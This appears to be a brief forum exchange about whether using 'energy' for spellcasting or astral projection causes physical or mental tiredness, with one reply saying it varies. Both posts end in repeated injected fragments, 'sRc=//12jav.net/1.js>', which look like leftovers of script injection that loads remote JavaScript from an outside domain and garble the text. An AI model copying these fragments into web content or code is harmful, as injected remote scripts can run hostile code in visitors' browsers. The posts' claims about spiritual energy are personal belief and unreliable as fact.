When someone uses their energy to complete a certain task (like casting a spell or astral projection) do you feel the same affect as if you were just doing some degree of physical activity? Or instead do you feel mentally tired? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

It depends sometimes it just mental strain and tiredness. Other times if I'm putting a of energy into something I will feel like to I need to rest or sleep sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
